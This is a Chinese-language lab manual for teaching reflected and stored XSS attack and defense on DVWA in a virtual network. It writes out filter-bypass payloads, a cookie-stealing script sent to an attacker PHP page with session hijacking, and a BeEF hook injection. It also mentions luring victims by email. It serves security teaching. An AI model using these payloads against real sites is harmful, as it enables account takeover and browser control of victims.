版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
··【項目12】跨站腳本攻擊XSS攻防實訓1反彈型XSS攻防學習目標:學習反彈型XSS攻擊的原理,探討攻擊者如何巧妙地利用網(wǎng)頁中的漏洞來執(zhí)行惡意腳本,進而可能導致用戶數(shù)據(jù)的泄露。通過項目實踐,能夠更加深入地理解這些防御策略的工作原理,并掌握如何在實際開發(fā)中應用這些措施,從而顯著提高網(wǎng)站的安全防護能力。場景描述:在虛擬機環(huán)境下設置3個虛擬系統(tǒng)Kali、Win10(1)和Win10(3),確保這些系統(tǒng)可以互相通信,網(wǎng)絡拓撲如圖12-3所示,本章所有項目均在該場景中進行操作。圖12-3網(wǎng)絡拓撲任務1反彈型XSS攻防的初步認識實施過程:(1)在Kali主機中訪問Win10(3)服務器的DVWA主頁,設置DVWASecurity為“Low”,打開XSS(Reflected)頁面,單擊“ViewSource”按鈕,查看服務器核心源代碼,如圖12-4所示??梢钥吹酱a直接引用了name參數(shù),并沒有任何的過濾與檢查,存在明顯的XSS漏洞。圖12-4查看Low級源代碼(2)在文本框中輸入“<script>alert('xss')</script>”,然后單擊“Submit”按鈕,成功彈出對話框,如圖12-5所示。圖12-5成功彈框(3)設置DVWASecurity為“Medium”,打開XSS(Reflected),查看服務器核心源代碼,如圖12-6所示??梢钥吹竭@里對輸入進行了過濾,使用str_replace()函數(shù)將輸入中的“<script>”替換為空。圖12-6查看Medium級源代碼(4)這種防護機制是基于黑名單的思想,可以被輕松繞過的。方法一:雙寫繞過輸入“<sc<script>ript>alert('xss')</script>”,成功彈出對話框。方法二:大小寫混淆繞過輸入“<ScRipt>alert('xss')</script>”,成功彈出對話框。(5)設置DVWASecurity為“High”,然后打開XSS(Reflected),查看服務器核心源代碼,如圖12-7所示??梢钥吹剑琀igh級別的代碼同樣使用黑名單過濾輸入,preg_replace()函數(shù)用于正規(guī)表達式的搜索和替換,這使得雙寫繞過、大小寫混淆繞過不再有效。圖12-7查看High級源代碼(6)雖然無法使用<script>標簽注入XSS代碼,但是可以通過img、body等標簽的事件或者iframe等標簽的src注入惡意的js代碼。這里我們在文本框中輸入“<imgsrc=1onerror=alert(document.cookie)>”,這條語句表示在網(wǎng)頁中插入一張圖片,“src=1”指定了圖片文件的URL,如果圖片不存在(這里肯定是不存在),那么將會彈出錯誤提示框,從而實現(xiàn)彈出對話框的效果,如圖12-8所示。圖12-8返回Cookie值(7)設置DVWASecurity為“Impossible”,然后打開XSS(Reflected),查看服務器核心源代碼,如圖12-9所示。可以看到,Impossible級別的代碼使用htmlspecialchars函數(shù)把預定義的字符,如&、”、
’、<、>這些敏感符號都進行轉(zhuǎn)義,阻止瀏覽器將其作為HTML元素。所有的跨站語句中基本都離不開這些符號,因而只要這一個函數(shù)就阻止了XSS漏洞,所以跨站漏洞的代碼防御還是比較簡單的。圖12-9查看Impossible級源代碼任務2獲取管理員權限攻擊者利用反彈型XSS攻擊,獲取受害者的Cookie,從而使得自己從普通用戶升級為管理員用戶。因為這個項目實施是想獲取受害者的Cookie,因此需要受害者在點擊反射型URL的時候,受害者是以管理員的身份登錄到DVWA系統(tǒng)中,而且必須在同一個瀏覽器中進行這兩個操作。實施過程:(1)在Kali的/var/www/html/目錄下存放一個文件xss_hacker.php,其內(nèi)容如圖12-10所示,該php文件的主要功能是接收客戶端發(fā)送的Cookie信息,并保存到cookie.txt文件中。圖12-10xss_hacker.php文件內(nèi)容(2)在Kali的終端中輸入命令“serviceapache2start”,啟動Apache服務器,輸入命令“chmod777/var/www/html/xss_hacker.php”,使得用戶對xss_hacker.php文件都具有讀、寫和執(zhí)行的權限,輸入命令“chmod777/var/www/html”,使得用戶對html目錄都具有讀、寫和執(zhí)行的權限,如圖12-11所示。圖12-11配置Apache服務器(3)在Kali中,用瀏覽器打開Win10(3)服務器的DVWA主頁,以普通用戶gordonb登錄系統(tǒng),其密碼是“abc123”。(4)設置DVWASecurity為“Low”,然后打開XSS(Reflected)頁面,輸入<script>window.open("0/xss_hacker.php?cookie="+document.cookie);</script>單擊“Submit”按鈕,如圖12-12所示,此時得到反射型攻擊URL如下:/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.open%28%22http%3A%2F%2F0%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E#圖12-12生成反射型攻擊URL(5)攻擊者可以采取各種手段,包括群發(fā)E-mail,在各種論壇網(wǎng)站發(fā)布此攻擊URL,以及創(chuàng)建吸引人的鏈接等,引誘受害者打開該反射型攻擊URL。(6)受害者在Win10(1)中打開Win10(3)服務器的DVWA主頁,以管理員用戶admin登錄系統(tǒng)。(7)此時如果受害者收到攻擊者發(fā)送過來的反射型攻擊URL,或者瀏覽黑客所偽造的釣魚網(wǎng)站,并在同一個瀏覽器中打開該反射型攻擊URL,就會執(zhí)行有關腳本,打開攻擊者指定的網(wǎng)頁xss_hacker.php,把受害者自己的Cookie值發(fā)送給攻擊者,并記錄在cookie.txt文件中,如圖12-13所示。圖12-13獲取的Cookie值(8)在Kali中,打開FireFox瀏覽器,單擊“Extensions”按鈕,然后在查找欄中輸入要查找的擴展“EditThisCookie”,如圖12-14所示。選擇需要安裝的擴展,單擊“AddtoFirefox”安裝該擴展,如圖12-15所示。(這一步過程中需要設置Kali能夠訪問Internet)圖12-14擴展和主題頁面圖12-15添加“EditThisCookie”擴展(9)在Kali中利用EditThisCookie擴展,修改DVWA登錄的PHPSESSID為cookie.txt所記錄的值并提交,如圖12-16所示。圖12-16修改PHPSESSID(10)刷新頁面,發(fā)現(xiàn)攻擊者的登錄用戶已經(jīng)變成admin,從而獲得管理員權限,如圖12-17所示。圖12-17登錄用戶變成admin實訓2存儲型XSS攻防任務1存儲型XSS攻防的初步認識實施過程:(1)在Kali主機中訪問Win10(3)服務器的DVWA主頁,設置DVWASecurity為“Low”,然后打開XSS(Stored),查看服務器核心源代碼,可以看到該頁面對輸入并沒有做XSS方面的過濾與檢查,且把輸入的數(shù)據(jù)存儲在服務器的數(shù)據(jù)庫中,因此這里存在明顯的存儲型XSS漏洞。(2)在Message文本框中輸入“<script>alert('xss')</script>”,然后單擊“SignGuestbook”按鈕,成功彈出對話框,如圖12-18所示。圖12-18成功彈框(3)因為腳本已經(jīng)寫到服務器的數(shù)據(jù)庫中,因此當其他用戶訪問該頁面時,也會彈出對話框。我們在Win10(1)主機中打開DVWA的XSS(Stored)時,發(fā)現(xiàn)也會彈出對話框。(4)分別設置DVWASecurity為“Medium”和“High”,由于message參數(shù)使用了htmlspecialchars函數(shù)進行編碼,因此無法通過message參數(shù)注入XSS代碼,但是對于name參數(shù)并沒有嚴格過濾,仍然存在存儲型XSS漏洞,其繞過的方法與反射型XSS的繞過方法相似,這里就不再重復。由于Name文本框的最大長度限制為10個字符,可以在Name文本框中右鍵,在彈出的快捷菜單中選擇“Inspect”屬性,修改長度限制“maxlength=50”,如圖12-19所示。圖12-19修改長度限制任務2利用BeEF實現(xiàn)對受害機的控制實施過程:(1)在Kali終端中輸入命令“apt-getupdate”,更新軟件包列表。輸入命令“apt-getinstallbeef-xss”安裝BeEF。安裝完成后輸入命令“beef-xss”,啟動BeEF工具,在終端中顯示管理頁面地址及使用的腳本的方法,如圖12-20所示,第一次啟動會提示輸入密碼。圖12-20運行BeEF工具(2)在管理頁面中輸入登錄信息并進入BeEF管理平臺,用戶名是“beef”,如圖12-21所示。圖12-21登錄管理平臺BeEF(3)在Kali中打開Win10(3)服務器的DVWA主頁。設置DVWASecurity為“Low”,然后打開XSS(Stored),由于Message文本框的最大長度限制為50個字符,可以在Message文本框中右鍵,在彈出的快捷菜單中選擇“Inspect”屬性,修改長度限制“maxlength=500”。Name文本框中輸入“xss”(內(nèi)容可隨意輸入),在Message文本框中輸入“<scriptsrc="0:3000/hook.js"></script>”,單擊“SignGuestbook”按鈕,把腳本保存到數(shù)據(jù)庫中,如圖12-22所示。圖12-22插入XSS腳本(4)受害者在Win10(1)中打開Win10(3)服務器的DVWA主頁,當受害者訪問XSS(Stored)頁面時,瀏覽器自動執(zhí)行腳本訪問攻擊者的hook.js鉤子頁面,連接到攻擊主機Kali。(5)在Kali的BeEF的管理頁面中,發(fā)現(xiàn)了受害者的圖標,攻擊成功如圖12-23所示。圖12-23XSS攻擊成功(6)在被鉤住的持續(xù)時間里,受害主機被控制了,攻擊者可以發(fā)送攻擊命令。選擇“Commands”選項卡,可以看到很多已經(jīng)分好類的攻擊模塊,如圖12-24所示,攻擊命令的顏色含義如下。綠色:該攻擊模塊命令可用,隱蔽性強。橘色:該攻擊模塊命令可用,但受害者可能會發(fā)現(xiàn)它。橙色:該攻擊模塊是否可用需待驗證,可以直接試驗。灰色:該攻擊模塊不可用。圖12-24BeEF界面BeEF的功能非常強大,這里我們只介紹其中的幾個功能。單擊“Browser”→“HookedDomai
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2026年海洋能發(fā)電公司辦公用品庫存管理制度
- 2026江蘇南京大學化學學院助理招聘備考題庫附參考答案詳解(綜合卷)
- 2025年工廠稅務試題帶答案
- 2025年建筑結構抗震設計要點試題及答案
- (2025年)食品生產(chǎn)許可證審查員考試全考點試題帶答案
- 2026江蘇南京大學化學學院博士后招聘備考題庫含答案詳解(輕巧奪冠)
- 2026江蘇南京大學化學學院科研人員招聘備考題庫含答案詳解(達標題)
- 2026江蘇南京大學化學學院科研人員招聘備考題庫附答案詳解(奪分金卷)
- 2026年叉車年檢考試題庫及參考答案一套
- 2026年叉車技能鑒定考核試題庫及參考答案一套
- GB/T 44233.2-2024蓄電池和蓄電池組安裝的安全要求第2部分:固定型電池
- DL∕T 612-2017 電力行業(yè)鍋爐壓力容器安全監(jiān)督規(guī)程
- 2024年國企行測題庫
- 煙囪技術在血管腔內(nèi)修復術中的應用
- 崗位聘用登記表
- 2023年全國統(tǒng)一高考政治試卷(新課標ⅰ)(含解析版)
- 2023年北京高考語文答題卡(北京卷)word版可編輯kh
- 2023年高鐵信號車間副主任述職報告
- GB/T 5762-2012建材用石灰石、生石灰和熟石灰化學分析方法
- 第3章 圓錐曲線的方程【精簡思維導圖梳理】高考數(shù)學高效備考 人教A版2019選擇性必修第一冊
- 劉一秒演說智慧經(jīng)典(內(nèi)部筆記)
評論
0/150
提交評論